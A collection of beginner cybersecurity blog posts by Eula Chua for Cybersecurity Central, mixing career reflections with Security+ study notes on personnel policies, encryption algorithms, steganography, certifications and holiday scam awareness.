BLOG BY EULA
Cybersecurity Central is excited to share Blog by CC.
Bookmark this page and check back to learn what Eula Chua is discovering in her #infosec journey.
#cybersecuritycentral #diversityofthought #blogbycc
TABLE OF CONTENTS
AUG 7, 2023
Easing In
by Eula Chua
August 7, 2023I never thought 2023 would be such a fast and busy year for me. It has officially been 6 months since I entered the field of Information Technology! it has been such an endless learning experience on the job and it makes me excited for what’s next.
Because it’s been such a huge change in routine for me, my mind was craving for more professional development but it was difficult to find time with how demanding personal and work responsibilities could be. Although, I was glad to have booked off one of the weekends in May to learn some Microsoft Azure Fundamentals, which is something I would love to share more about in a future post!
But for this week, I’m choosing to ease myself in and absorb everything I’ve learned in the past 6 months. I do apologize that I have been quite MIA for the past few weeks. Not only am I easing into a fairly new career path, I’ve also been planning and preparing for a new chapter in life that I may or may not share in another future post, we shall see!
Life has its ways of surprising you. And when it does, you take what you get and mold it into something beautiful. I’ll see you at the next post and hope to share more about what I’ve been learning (tech and non-tech related).
Let’s stay connected on socials: https://www.LinkedIn.com/in/eulac-lipro
MAY 10, 2023
Security at Work
by Eula Chua
May 10, 2023Working in IT has been great these past few months. Everyday, I get to learn different parts of the operation. From doing onboarding/offboarding tasks such as setting up laptops and managing mobile devices to diving deep into the administration side of IT, I’m fortunate to be exposed to all kinds of different issues that allows me to exercise my problem solving skills. As I continue to ease into the environment and defining my role, I also think about the improvements that we can implement into our environment.
You might not realize this. Everyday you are practicing Cybersecurity. It is not confined to one role. Whether you’re working in the cybersecurity sector or just starting out your IT career, everyone has a part in keeping their environment secured – leading by example, using a password manager, creating complex passwords, keeping a clean desk space, running Windows updates consistently, the list goes on. Most issues we encounter can be prevented through user education. Get your users on board with best security practices. Keep them informed on rising trends. Take every opportunity to implement security at your work place because the worst thing that can happen is shutting down a business by a click of a button that can be prevented. A great place to start talking about security at work is through security awareness training.
Check out these resources to learn more about security awareness:
Infosec: Security Awareness -- Definition, History, and Types | Infosec Resources https://resources.infosecinstitute.com/topic/security-awareness-definition-history-types/
Amazon Security Awareness Training: https://learnsecurity.amazon.com/en/index.html
Mimecast: What is Security Awareness Training & Why is it Important?
CybSafe: 7 reasons why security awareness training is important in 2023
Microsoft: Cybersecurity Awareness – Microsoft Security
Let’s stay connected on socials: https://www.LinkedIn.com/in/eulac-lipro
APR 26, 2023
Types of Personnel Policies to Mitigate Risks: Part III of III
by Eula Chua
April 26, 2023As we are on the last stretch of how to mitigate security risks through the implementation of personnel policies, it’s important to note that not all risks come from the online network but offline as well. Otherwise, these policies wouldn’t exist. This week, we’re looking deeper into the remaining four policies, which are Non-Disclosure Agreement (NDA), Third-Party Risk Management, Terms of Agreement, and Measurement Systems Analysis.
1. Non-Disclosure Agreement - This policy is implemented within two parties in which data that is shared between them is not to be disclosed to unauthorized parties. This is also used in companies to prohibit employees from disclosing data that is strictly meant to be kept within the organization. This includes not sharing with unauthorized entities while being employed or when offboarding the company. This category includes social media analysis, which is used to verify whether an employee is compliant with the policies in place.
2. Third-Party Risk Management - This can be overlooked, especially when trust is involved. Many do not realize that being connected to other entities outside of the company can pose a risk. This is where having security policies can help with mitigating these risks. Third-Party Agreements include:
a. Memorandum of Understanding (MOU)/Memorandum of Agreement (MOA), where two or more entities come to an understanding in terms of working towards a mutual goal
b. Business Partners Agreement (BPA), where a written agreement is established between business partners to indicate their responsibilities and obligations while working together
c. Service Level Agreement (SLA), where expectations are laid out between an entity and a vendor to ensure standards are met
3. Terms of Agreement - This is usually added as a clause in a legal document, indicating when an agreement comes into effect
4. Measurement Systems Analysis (MSA) - This determines the accuracy of data collected by evaluating the tools and processes used to measure. An example of this would be measuring data based on the type of equipment being used and how it is being used.
What policies do you notice that are heavily implemented in your current organization? Do you feel that it’s working to mitigate risk or create restrictions on the processes done at your organization?
References:
Gibson, D. (2020). CompTIA Security+ : Get Certified Get Ahead SY0-601 Study Guide. Ycda, Llc.
APR 12, 2023
Types of Personnel Policies to Mitigate Risks: Part II of III
by Eula Chua
April 12, 2023I’m In the topic of security policies, here are the next 4 personnel policies that will help mitigate risks and data theft within an organization. Taking these preventative measures will also help the organization build reliability and trust with external parties and internal employees.
Job Rotations - This policy can be temporary or permanent. Not only does this concept require employees to switch different job roles for exposure and learning opportunities, but this also prevents or exposes fraudulent activity. This is similar to the separation of duties concept, which prevents giving full control to an individual.
Clean Desk Space - As self-explanatory as it can be, having a clean desk space ensures that an area is kept organized and reduces the chance of leaving any sensitive information out in the open. Keeping a desk space free of paper prevents possible data theft or potential leaks of confidential information.
Background Check - Usually performed during an onboarding process, an employee undergoing a background check would help build trust and identify any piece of the employee’s history that may pose a risk to the company. Background checks vary within each organization, depending on what type of roles and responsibilities an employee will be performing. Background checks may include criminal record checks, financial credit checks, and social media/online activities.
Onboarding & Offboarding - Onboarding is the start of the hiring process where an employee is given any IT equipment to perform their job and access to the appropriate resources within the organization using a work account. Offboarding is a process done when an employee is exiting the company. In these situations, everything that was issued to the employee, in the beginning, is collected. This process includes disabling all related work accounts, IT equipment collections, collection of keys/key card accesses, laptops, phones, and other devices.
Take a moment to observe your current employer. Are some of these personnel policies mentioned being practiced within your workplace or are they non-existent? What can you do to improve information security within your workplace? What is something you can start doing today?
For more information regarding personnel policies, check out the reference below. This serves as a great study resource for the CompTIA Security+ and I highly recommend it.
References:
Gibson, D. (2020). CompTIA Security+ : Get Certified Get Ahead SY0-601 Study Guide. Ycda, Llc.
MAR 29, 2023
Types of Personnel Policies to Mitigate Risks: Part I of III
by Eula Chua
March 29, 2023I’m beginning to witness how the material I have studied for during my CompTIA Security+ exam preparation is being implemented in a corporate environment. As part of the administrative control category, maintaining personnel policies can help reduce and manage risk by preventing data theft and loss, as well as incidents, when followed by employees. Although the policies pertain to personnel behaviour and expectations, these help with keeping security on top of mind. There are 12 categories under personnel policies. In each blog, we’ll go through 4 of them:
Acceptable Use Policy - This policy mainly introduces computer systems and networks but also describes the responsibilities of users when accessing the systems and how they can be accessed. Organizations may include AUPs in their contracts upon hiring. Users are informed that they can be monitored based on their web and email activity. The purpose of this is to help prevent users from accessing data from external sources that may potentially introduce a breach into the network of the organization.
Mandatory Vacations - This policy requires employees to take time off from work. By doing so, this can help detect any malicious activities occurring that may involve employees. This also helps to deter fraud, but not necessarily prevent it.
Separation of Duties - This is a principle prevents fraud, errors, and theft by dividing tasks between multiple employees. Delegating different tasks to other employees prevents a single employee or entity from completing an entire process on their own or having full control of a process that may be deemed sensitive, lessening the chances of committing fraud.
Least Privilege - This policy enables specific rights and permissions to be assigned to an individual, but nothing more. In order to reduce risk and potential losses, a user is to be given access to a limited amount of data, enough to perform their assigned tasks but not overly restricting them.
For more information regarding personnel policies, check out the reference below. This serves as a great study resource for the CompTIA Security+ and I highly recommend it.
References:
Gibson, D. (2020). CompTIA security + : get certified get ahead SY0-601 study guide. Ycda, Llc.
Let’s stay connected: https://www.LinkedIn.com/in/eulac-lipro
MAR 15, 2023
Cybersecurity on YouTube
by Eula Chua
March 15, 2023Everyone has their own way of absorbing and learning new information. Today’s technology has enabled us to learn via different avenues—through books, articles, podcasts, and videos.
Having a 9-5 schedule can be difficult, especially when you’re using a lot of brain power at work. Making time for learning and development after work is a commitment and sometimes it’s just not doable for everyone. If you’re in this position, don’t worry. You are not alone.
A few weeks ago, I recommended a few resources and articles on how to keep up with the latest IT/Cybersecurity news via articles.
If you are currently following us on LinkedIn, you’ll notice that every Monday, we post about what’s happening #ThisWeekInCybersecurity where we share shows, segments, and learning opportunities from Cybersecurity industry experts.
Some can be long formats, others short. If you’re on the road or commuting to work, YouTube is a great platform to stay up-to-date. Though Cybersecurity communities are ever present on LinkedIn, here are some channel recommendations on YouTube where you can also engage and be a part of the community. From giving guidance on how to grow a career in cybersecurity to sharing about what it’s like to work in the industry, these are some of experts I have been following and learning from:
Most of these are located on Cybersecurity Central's Resources by CC page. Check it out, then let us know if you have a channel to recommend. If so, send us a message on LinkedIn!
Let’s stay connected: https://www.LinkedIn.com/in/eulac-lipro
MAR 8, 2023
My (almost) 3 Month Journey in a Gist
by Eula Chua
March 8, 2023It was once a thought, let alone, a dream, to be able to work in IT. I’m almost three months in and I cannot even emphasise how rewarding it is to be in this field. I love that I get to assist users with simple or complex issues and being able to resolve it together.
At my workplace, everyday is different. There are days where I would be working on the ticket queues, supporting users within the office, online, on construction sites, or pass the border with all kinds of issues — printers, networks, hardware, e-mail, software, and more. There are days where I would be setting up new IT equipment for on-boarding employees and days where I would be moving an entire department onto a new floor. As someone who usually performs well with routine, I did not expect to enjoy a schedule with so much flexibility.
I found that being in IT is not just about fixing things. A big part of being in IT is building relationships, especially if you’re working in an internal IT team for a company. Not only am I learning and building my technical and communication skills, I am also building resilience and growing in humility. “You don’t know what you don’t know.” When it comes to encountering a problem you’ve never dealt with before, it’s important to be honest with yourself and with the user. If you’re not sure how to solve something, communicate the truth with them but most importantly, reassure them that you will find a way to get the issue solved. Most of the time, the user will understand depending on the level of issue that you are dealing with. I found that putting myself in the other person’s shoes is what helps me understand what the user might be going through and how I can better assist them.
Overall, my experience in IT and in my new workplace has been amazing so far. There’s definitely a lot of learning, growth, and opportunity in the position that I am in. Although I have been having troubles balancing my time with work, leisure, (and LinkedIn), I hope that in the next couple of months, I’ll be able to find time to further my studies, build up my skills within IT and Cyber Security, and continue sharing my journey with you.
Let’s stay connected: https://www.LinkedIn.com/in/eulac-lipro
FEB 22, 2023
Keeping Up-to-Date With Cybersecurity News
by Eula Chua
February 22, 2023With all the personal responsibilities, professional development, and other daily tasks we have on our plates, it can be hard to find time to keep up with what’s new within the IT/Cyber Security industry.
New technologies and trends continue to move forward drastically. It’s essential to stay up-to-date to ensure we don’t miss out on what could help or break our systems, let alone, our overall workflows.
Whether you have time for a workout or listen/read during a commute, here are some of the top news resources you should check out:
Simply Cyber’s Daily Cyber Threat Brief: Gerald Auger, PhD - Simply Cyber
CISO Series’s Cyber Security Series: Home - CISO Series
Bleeping Computer’s latest articles: BleepingComputer
IT World Canada’s Cybersecurity Today: Technology News for IT Professionals in Canada | IT World Canada
The CyberWire’s CyberWire Daily: CyberWire Daily
The Hacker News: The Hacker News | #1 Trusted Cybersecurity News Site
Security Week: Security Week Home
Dark Reading: Dark Reading | Security | Protect The Business
Sophos’ Naked Security: Naked Security
Take a look at our tab above for more resources recommended by Cybersecurity Central and follow us on our Cybersecurity Central LinkedIn page for new updates every week!
Follow Eula on LinkedIn at: https://www.linkedin.com/in/eulac-lipro
FEB 8, 2023
Asymmetric Key Encryption Algorithms
by Eula Chua
February 8, 2023Hope you had time to reflect as we began the month of February. If you haven’t yet, check out my previous blog post, “Time for Reflection”.
Two weeks ago, we looked into what a symmetric key encryption algorithm is and the key differences between each one that fall under that category. This week, we’re going back to our regular programming on encryption algorithms and dive deeper into asymmetric key encryption.
In asymmetric encryption, 2 different keys are used. A public key is used for encrypting and a private key for decrypting. A common use for this type of encryption would be when messages are sent over the network, allowing secure communication between 2 parties. In this case, the public key enables others to view and access what is being sent. The private key only allows authenticated users to access what is sent to them. Both keys are needed to be able to decode a message. Although the encryption process is slow, this type is used to transfer small amounts of data. This makes asymmetric encryption more secure than symmetric encryption and it provides confidentiality, authenticity, and non-repudiation. A few examples are: Diffie-Hellman, ElGamal, ECC (Elliptic-Curve Cryptography), RSA (Rivest Shamir Adleman), and DSS (Digital Signature Standard). Let’s look at the key points of each one.
Diffie-Hellman:
Developed in the 1970s, by Dr. Whitfield Diffie and Dr. Martin Hellman
Key exchange technique used within insecure networks
Enables 2 users to exchange public and private keys securely
Used applications where it would generate new key pairs per new session
Includes a password-authenticated key agreement
Best used to counter man-in-the-middle/on-path attacks
ElGamal:
- Founded by Taher Elgamal in the 1980s
- Based on the Diffie-Hellman exchange
- The goal is to make it difficult to calculate the encryption approach regardless if the attacker knows certain information
ECC (Elliptic Curve Cryptography):
- Creates smaller and efficient cryptography keys
- Faster and lightweight
- More secure as it is able to generate more robust mathematical keys
- Can be used in combination with other encryption methods for increased security and performance using less keys
RSA (Rivest Shamir Adleman):
- Founded by Ron Rivest, Adi Shamir, and Leonard Adleman in the 1970s
- Most widely used to asymmetrically encrypt data that is sent over insecure networks
- Provides data integrity, confidentiality, and authenticity of transmitted data
- Can have key-lengths of 1024-bits or 2048-bits
DSS (Digital Signature Standard):
- Uses digital signatures to authenticate encrypted data, files, and softwares
- Can detect signs of attempted tampered information or modification of data while being in transit
- US federal government agencies uses DSS to generate and validate digital signatures
References:
Types of Encryption [Explanations, Examples, Purposes]. (2022, June 2). Review42.com.
https://review42.com/resources/types-of-encryption/
Asymmetric Encryption: Definition, Architecture, Usage | Okta. (n.d.). Www.okta.com. Asymmetric Encryption: Definition, Architecture, Usage | Okta
Asymmetric Encryption Algorithms, Diffie-Hellman, RSA, ECC, ElGamal, DSA. (n.d.). www.omnisecu.com. https://www.omnisecu.com/security/public-key-infrastructure/asymmetric-encryption-algorithms.php
ElGamal Encryption | Simple Steps How EIGamal Encryption Happens. (2019, December 12). EDUCBA.com https://www.educba.com/elgamal-encryption/
5 Super Asymmetric Encryption Example Use Cases - CyberExperts.com. (2021, November 7). Cyberexperts.com. https://cyberexperts.com/asymmetric-encryption-example/
FEB 1, 2023
Time for Reflection
by Eula Chua
February 1, 2023Hello February!
=====
Originally I planned to continue on the topic of encryption algorithms but today’s #BlogByCC happened to fall perfectly on a new start to the month, and to do things differently, I want to take this opportunity to encourage and promote more self-reflection. I noticed throughout the years, I would go months on just zooming through life and end up feeling a little bit lost in between. Just as with studying, if you don’t go back to review what you learned, you’ll end up forgetting it. Similarly with life, if you don’t take the time to reflect on how things are going, how would you know where you’re heading towards is the direction you want to be going?
First of all, happy 1st of February! I can’t believe January flew by just like that. I remember starting off the month feeling a mixture of excitement and nervousness. I started my new IT career at a new workplace, which has been by far amazing and exceeds my expectations. There are moments where I felt a little bit of impostor syndrome but that gets trumped when I realize that I’m in a positive environment surrounded with people who genuinely care for your well-being, growth, and development. I get to say that I am a part of a growing and collaborative team that teaches and supports users on how to effectively use technology to help streamline their workflow. You know you’re making it when work doesn’t feel like work and that everyday is an opportunity to learn new things.
Enough about me and more about you! As we start a new month, new goals, and new aspirations, take a break to sit down and look back on how your January went. Here are some questions that may help you reflect on the past and upcoming month:
What are you grateful for?
Who are you thankful for?
What are some of the exciting/memorable moments that happened?
What are some challenging moments you encountered and how did you grow from that experience?
What was one thing you learned last month that you will continue to implement?
What is one thing you’ve decided to leave behind?
What adjustments do you need to make that will help you reach your goals?
How did I feel this month and how do I want to feel for next month?
What can you do better?
On behalf of Cybersecurity Central, we hope you have a wonderful month of February! Let us know how we can support you in your personal development and career growth in the IT/Cybersecurity sector by connecting with us through the Cybersecurity Central LinkedIn Page: https://www.linkedin.com/company/cybersecuritycentralorg
JAN 25, 2023
Symmetric Key Encryption Algorithm
by Eula Chua
January 25, 2023Last week, we looked into the key differences between symmetric and asymmetric key encryption algorithms. The differences were found within the speed of how they process and secure data, the level of security it provides, the number of keys used to encrypt and decrypt, the length and sizes between the cipher text and plain text, and what they are used for.
This week, we’ll dive deeper into symmetric key encryption and its different types. Symmetric encryption is used to keep data being communicated secure in which only users with authorization can access it. This type of encryption uses the same key to encrypt and decrypt information. Although this keeps things cost-effective and easy to use, it is less secure. This is best used for handling and transferring large amounts of data. There are several types of symmetric key encryption, which are 3DES, DES, AES, RC4, Twofish, and Blowfish. Let’s look at the key points in each one.
3DES (Triple Data Encryption Standard):
Encrypts data three times compared to DES
Has a fixed-length of 192 bits, using three segments of 64-bit keys
Is a block cipher
Uses a private key
DES (Data Encryption Standard):
Created by an IBM team in the early 1970s
Encrypts using a 56-bit sized key
Block cipher
Considered no longer safe to use
AES (Advanced Encryption Standard):
Created to replace the DES
Block cipher
Originally named Rijndael
Uses three different keys to encrypt/decrypt 128-bit data: AES-128 (10 rounds), AES-192 (12 rounds), AES-256 (14 rounds)
Method used to protect government and sensitive information
Available for free for public or private use
RC4 (Rivest Cipher 4):
Created by Ron Rivest in 1987
Considered a variable key-size stream cipher
Uses 64 or 128-bit key sizes
Simple and fast to use
Mainly used in applications like SSL (secure socket layer) and TLS (transport layer security)
Twofish:
Successor of Blowfish
Block cipher
A type of 128-bit encryption with a variable-key length that can go up to 256 bits
Considered highly secure
Blowfish:
Designed by Bruce Schneier in 1993 as an alternative to DES
Considered a 64-bit block cipher
Uses a variable-length key encryption, encrypting between 32-448 bits in segments
Uses 16 rounds to encrypt information
Since it’s not patented, this method is available and free to the public
References
What Is Encryption? Explanation and Types. (n.d.). Cisco. What Is Encryption? Explanation and Types
Geeksforgeeks. (2020, January 29). Difference Between Symmetric and Asymmetric Key Encryption. GeeksforGeeks. Difference Between Symmetric and Asymmetric Key Encryption - GeeksforGeeks
What is RC4 Encryption? (2020, July 14). GeeksforGeeks. What is RC4 Encryption? - GeeksforGeeks
Indeed. (N.d.). Types of Encryption. Indeed. Types of Encryption: 5 Common Encryption Algorithms
Simplilearn. (2020, June 17). What is DES? The Data Encryption Standard Explained. Simplilearn..What Is DES (Data Encryption Standard)? DES Algorithm and Operation [Updated]
JAN 18, 2023
Symmetric vs. Asymmetric Encryption: Key Differences
by Eula Chua
January 18, 2023I remember studying for CompTIA Security+ certification a couple of months ago and the topic I had trouble grasping was the difference between symmetric and asymmetric encryption.
First, let’s look at encryption. Encryption is the process of scrambling readable text (plaintext) into a code (ciphertext) to prevent unauthorized parties from accessing it. The only way it can be converted back to plaintext is if the authorized party possesses the decryption key. This is a method of securing sensitive information that gets passed online.
The two main types of encryption are symmetric and asymmetric. The main difference would be the use of keys, which are used to decrypt/unscramble a secret code.
Symmetric key encryption uses one key to encrypt and decrypt a message or data. Although it is at its convenience to have one key making the encryption process fast, it is less secure. It would require the receiving party to share the same key as the sender, which puts data being sent over the network at risk of being uncovered.
Asymmetric key encryption requires two keys, a public key and a private key to encrypt and decrypt a message or data. Compared to symmetric key encryption, it is considered much more secure but a much slower process. The downside to this is that if the private key gets lost, there’s no other way to decrypt the data. Geeks for Geeks created a table of comparison that best describes the differences between the two:
Symmetric Key Encryption
It only requires a single key for both encryption and decryption.
The size of the cipher text is the same or smaller than the original plain text.
The encryption process is very fast.
It is used when a large amount of data is required to transfer.
It only provides confidentiality.
The length of the key used is 128 or 256 bits
In symmetric key encryption, resource utilization is low compared to asymmetric key encryption.
It is efficient as it is used for handling large amounts of data.
Security is less as only one key is used for encryption and decryption.
Examples: 3DES, AES, DES and RC4
The Mathematical Representation is as follows:
P = D (K, E(P))
where K –> encryption and decryption key
P –> plain text
D –> Decryption
E(P) –> Encryption of plain text
Asymmetric Key Encryption
It requires two keys, a public key and a private key, one to encrypt and the other one to decrypt.
The size of cipher text is the same or larger than the original plain text.
The encryption process is slow.
It is used to transfer small amounts of data.
It provides confidentiality, authenticity, and non-repudiation.
The length of the key used is 2048 or higher.
In asymmetric key encryption, resource utilization is high.
It is comparatively less efficient as it can handle a small amount of data.
It is more secure as two keys are used here- one for encryption and the other for decryption.
Examples: Diffie-Hellman, ECC, El Gamal, DSA and RSA
The Mathematical Representation is as follows:
P = D(Kd, E (Ke,P))
where Ke –> encryption key
Kd –> decryption key
D –> Decryption
E(Ke, P) –> Encryption of plain text using encryption key Ke . P –> plain text
References:
Geeksforgeeks. (2020, January 29). Difference Between Symmetric and Asymmetric Key Encryption. GeeksforGeeks. Difference Between Symmetric and Asymmetric Key Encryption - GeeksforGeeks
Okeke, F. (2022, August 9). Asymmetric vs symmetric encryption: What’s the difference? TechRepublic. Asymmetric vs symmetric encryption: What’s the difference?
JAN 4, 2023
Happy New Year from Team CC!
by Eula Chua
January 4, 2023We hope that you have an amazing start of the year. Last year was a year full of discoveries and learning. I took some time to evaluate where I was in my current state and where I wanted to be in my career. There were moments that felt painfully slow, in terms of my personal progress, and moments where I felt like things were moving rapidly. There were moments I took risks, and there were others where I wished I had taken the leap of faith. Nevertheless, I’m grateful to be where I am at this moment and how much I have grown since the start of 2022. Most of my goals came to fruition because of self-reflection. Writing things down and keeping reminders on my calendar kept me away from distractions as best as possible.
This year, I have taken my reflection up a notch and although this is not related to cybersecurity, I wanted to share this resource to everyone because it’s free! This is not a sponsored post, although I vouch for this as many journal prompts included in this resource can either only be found in physical journals and planners, (planners can be costly), or you would have to search up questions on google or formulate your own.
Year Compass provides you all the questions that can help you reflect on your past year and re-evaluate what things and habits you need to keep or leave in the past. This also includes writing prompts to help you plan out your 2023 and make it a memorable one. They give you the option of printing a physical copy or downloading a digital copy that you can upload on your digital notes app. Check out the Year Compass here: https://yearcompass.com
What are your goals for the year of 2023? What certifications are you aiming to achieve? What courses will you be taking? What online communities will you be participating in?
Let’s keep one another accountable! Follow Cybersecurity Central on socials below to stay up-to-date with all the livestream events, online courses, and conferences happening every week!
DEC 28, 2022
Steganography
by Eula Chua
December 28, 2022Upon using TryHackMe as a learning platform, I remember learning about steganography for one of the lessons I started with and have not forgotten about it since. So what is steganography?
According to the Merriam-Webster dictionary, Steganography is the “art or practice of concealing a message, image, or file within another message, image or file” that is not so secret. The Greek word, “steganos” or “stegos” means “covered”, while the word “graph” means “to write.” This could look like a secret message or plain text embedded into a picture. To hide a sensitive message within a seemingly “ordinary” file is to avoid detection or suspicion. To elaborate, let’s look at the 5 different types of steganography.
Text Steganography
This method involves storing secret information and encoding it within a text document. Other techniques are called line-shift coding, word-shift coding, feature coding, and syntactic method. Check out Tutorials Point to learn more about these techniques: What are the Techniques of Text Steganography in Information Security?
Audio Steganography
This method is done to conceal messages within audio clips for the purpose of hiding data or by watermarking — to protect the audio from any unauthorized reproduction.
Image Steganography
This method is used to embed data within an image. This can involve altering the intensity values of the image pixels. Other forms of image steganography are as follows:
Stego-image: an image obtained after steganography, which contains hidden data
Stego-key: uses a key to embed hidden messages within a cover-image or stego-image
Cover-image: uses a picture to hide data
Message: actual data embedded within pictures, which can either be in text or image form
Video Steganography
This method involves concealing data by embedding it within a video file, which acts as the “carrier”. Discrete Cosine Transform (DCT) is often used as the method. This is done by inserting values in each image within the video file to conceal data.
Network/Protocol Steganography
This method uses network protocols such as TCP, UDP, and more to hide data. Covert channels may be utilized. These are channels that are not used to transfer but rather store information.
The main purpose of steganography is to provide some sort of hidden communication within those who may know how to uncover it. This can be used as an avenue to protect sensitive data from potential malicious attacks. With the constant development of technology, steganography can also be used as a method to deliver attacks. One way is using Powershell or BASH scripting to automate an attack, which can look like embedding and activating scripts within a Word or Excel file once it is opened with the purpose of corruption. It all depends on the motive.
References:
Merriam-webster.com. (2018). Definition of STEGANOGRAPHY. [online] Available at: Definition of STEGANOGRAPHY.
Simplilearn (2021). What is Steganography? Types, Techniques, Examples & Applications | Simplilearn. [online] Simplilearn.com. Available at: What is Steganography? A Complete Guide with Types & Examples.
Stanger, J. (2020). The Ancient Practice of Steganography: What Is It, How Is It Used and Why Do Cybersecurity Pros Need to Understand It. [online] CompTIA. Available at: The Ancient Practice of Steganography: What is it, How is it Used and Why Do Cybersecurity Pros Need to Understand it?.
www.tutorialspoint.com. (n.d.). What are the techniques of Text Steganography in Information Security? [online] Available at: What are the techniques of Text Steganography in Information Security? [Accessed 28 Dec. 2022].
GeeksforGeeks. (2019). Image Steganography in Cryptography - GeeksforGeeks. [online] Available at: Image Steganography in Cryptography - GeeksforGeeks.
DEC 14, 2022
Starting In IT first? Check Out These Free Resources!
by Eula Chua
December 14, 2022I have heard this question repeated multiple times (or a similar question just like this), “How can you protect something if you don’t know how it works?”
In a way, this holds true. How do you know what systems to protect? What parts of the networks or systems are vulnerable or at risk if something were to happen?
As someone in pursuit of a career in cybersecurity, I first made the goal to start in an IT role before I continue down the path. As a hands-on learner, I want to learn and understand the ins and outs, the network infrastructures, the vendors used, hardware, software, the issues that end-users may encounter on a daily basis, literally everything within a company. Surely, there are ways to transition into cybersecurity from a completely different industry or right out of graduation and there are wonderful and reputable industry professionals on LinkedIn who speak on this.
However, if you’re someone like me looking to start in IT or review the fundamentals, here are some great free resources I highly recommend:
KevTech IT Support: Kevtech IT Support
Kevin from KevTech IT Support shares valuable information that will help those transitioning into IT prepare for their first job. He shares about how to build your resume, IT FAQs, common IT interview questions, how to build up your own virtual home lab, and many more. He also has a community on Discord.
East Charmer: East Charmer
If you want to know what a day in the life looks like as an IT professional, Marie from East Charmer creates videos to show you on-the-job responsibilities. Not only that, she also creates videos to help those seeking an IT support role and also show a glimpse of what it’s like to work in the office vs working from home, what challenges and difficulties are faced within the role, and best IT practices.
RunCMD (formerly: IT Career Questions): RUN CMD
Zach from RunCMD gives you all the insights into IT, such as knowing which certifications and roadmap to take, which trending skills and topics to dive into, home labs you can start building, and basically everything you need to know to get into IT.
Cobuman: Cobuman
If you want to get super technical, Cobuman is your go-to. Ranging from teaching you how to prepare for your next IT interview or certification to providing tips on help desk issues you may encounter on the job, Cobuman is ready to help you get a head start into your IT career.
NetworkChuck: NetworkChuck
If you want to learn scripting, hacking, and everything tech related, check out Chuck from NetworkChuck on YouTube. He provides fun and informational videos on a lot of different topics like Linux, CCNA, Dockers, Raspberry Pi, Cloud, certifications, and more.
CBT Nuggets: CBT Nuggets
CBT Nuggets is a free IT on-demand training platform. They include courses from industry experts to help you study for your next IT certification or gain real-world IT skills.
Have I missed anything else that should be on this list?
Follow us on Cybersecurity Central on LinkedIn and let us know what else we can add!
DEC 7, 2022
CompTIA Network+ vs CCNA?: A Quick Learning Update
by Eula Chua
December 7, 2022The past few months have been so focused on studying on Security+ that it’s been awhile since I reviewed the fundamentals of networking. This month, I have decided to study and relearn some of the IT networking concepts in order to fully understand what those entering the IT field (or already in the field) will be protecting in the future. I haven’t decided if I want to pursue taking a certification exam and which certification exam to take but I do have the study materials to continue my independent learning. The 2 Network certificates that are highly sought out (industry standard) are CompTIA Network+ and the Cisco Certified Network Associate (CCNA), which will be the focus for today’s blog.
If you are someone who may be thinking about getting a Network certificate (or just studying for it) and can’t decide which one to take, to get you started, I’ll be sharing a few of the main differences and resources that may help you determine which certificate is right for you and meets your needs.
CompTIA Network+:
Vendor-neutral approach (knowledge covers a wide range of systems or tools)
Prepares for specific job roles within IT (i.e. Sys Admin, Network Engineer, etc.)
Great certificate to start with for those new to IT
Teaches business skills that are highly sought out
Focuses on knowledge-based
Exam allows approximately 90 minutes to complete
CCNA:
Concentrates on technical skills
Product-specific: provides an in-depth knowledge of networking skills on Cisco systems
Focuses on hands-on/practical exercises
Great certificate for those looking into a career in Networking
Exclusive to Cisco products and tools
Exam allows approximately 120 minutes to complete
Resources:
Best Beginner Networking Certification 2022 (RUN CMD): https://youtu.be/35EC8KxYb4I
Network+ vs. CCNA (Data Knox): https://youtu.be/Wb1A6LkYy1g
CompTIA Network+ vs. CCNA: Why IT Pros Should Earn CompTIA Network+ First. (n.d.). Default. Retrieved December 5, 2022, from https://www.comptia.org/blog/comptia-network-vs.-ccna
Greaves, R. (2020, July 17). CCNA vs Network+: Main Differences and Which to Choose. IT Career Central.
https://itcareercentral.com/ccna-vs-network/#Main_Differences_Between_CCNA_vs_Network
NOV 30, 2022
2022 Reflections
by Eula Chua
November 30, 2022This blog post will be a bit different than usual.
As you read this, December is literally a day away.
It’s easy to get into the loop of thinking that we haven’t done everything we wanted to do on our list for this year or maybe, we didn’t even have an exact plan to begin with and feel a bit all over the place. That is okay. Things happen and sometimes, the pivots we made may have been necessary.
This year, I took a step forward to dive into the world of cybersecurity. I can tell you for a fact that I had no exact direction to begin with but went in anyway. I took my time researching most of the resources I found and fixed up my LinkedIn profile, which led me to connect with many wonderful cybersecurity communities online.
As long as you take action one step at a time, one thing leads to another and before you know it, you’ve done more than many others who are stuck overthinking which moves to make. If you need somewhere to start, I recommend checking out our Resources page here in Cybersecurity Central.
I invite you to reflect with me and look back on our own journey this year. This way, we can get a sense of where we are, how we got here, and what we are looking forward to in 2023.
Feel free to take some notes and answer the following reflection questions:
What/Who am I grateful for this year?
What are some challenges I faced and overcame?
What are some big and small wins I have accomplished this year?
How have I grown this year (physically, mentally, spiritually, and emotionally)?
How have I contributed positively to my communities/workplace/family/friends…?
For more thought-provoking questions, check out this article by Indeed:
100 Student Reflection Questions You Can Ask Yourself
I hope these questions help you discover new and amazing things about yourself!
NOV 16, 2022
Get Ready for the Holidays and Potential Cyber Attacks
by Eula Chua
November 16, 2022We’re heading into the most wonderful time of the year. While some of us are getting ready for our upcoming Thanksgiving dinners, others are already preparing Christmas presents. Either everything goes smoothly or it doesn’t.
You may ask, “what do the holidays even have to do with cybersecurity?”
Everything.
Think about it. All the retail shops are busy getting ready to stock up for all the holiday sales. We’re busy thinking about what gifts to buy for each of our family members or panicking about what to cook for our upcoming dinner gatherings. Others are getting ready to fly out for vacation. These are some honourable mentions.
While we’re occupied with a million things to do during this season, adversaries are also doing the same.
Have you heard of the Log4J vulnerability, Log4Shell?
Log4J is a built-in software library within Java that was created by an open-source project maintained by the Apache Software Foundation. It logs activities within a web server by tracking and monitoring system calls. The Log4Shell vulnerability was discovered in December 2021, involving arbitrary code execution (ACE). Depending on the Log4J version being used on the application, Log4Shell enables an attacker to remotely control a device on the Internet. This was being done before IT/Cyber professionals discovered it, hence called a zero-day vulnerability.
How about the Cadbury Easter Egg Scam?
Around April 2022, a message with a phishing link was circulating all over WhatsApp, advertising that consumers would receive a free Easter chocolate basket from Cadbury Clicking on the link would take you to a web page where you can fill in your personal data. Eventually, Cadbury found out and issued a public alert.
If you noticed, both situations occurred near or during a holiday. Attackers very well know that people have a lot on their plates during busier seasons like these. By adding more on top of that, they would hope we’d fall into their traps.
How can we prepare for what’s to come? The best way to prevent this is awareness.
We don’t know what we don’t know. Awareness will help lead us to our solution.
Stay on top of the cyber attacks and learn about what occurs during holidays. Here are some great resources (but not limited to) that you can look into (some of these also include examples from the past):
5 Scams to look out for this Holiday season (Forbes): How To Avoid Getting Scammed During The Holidays
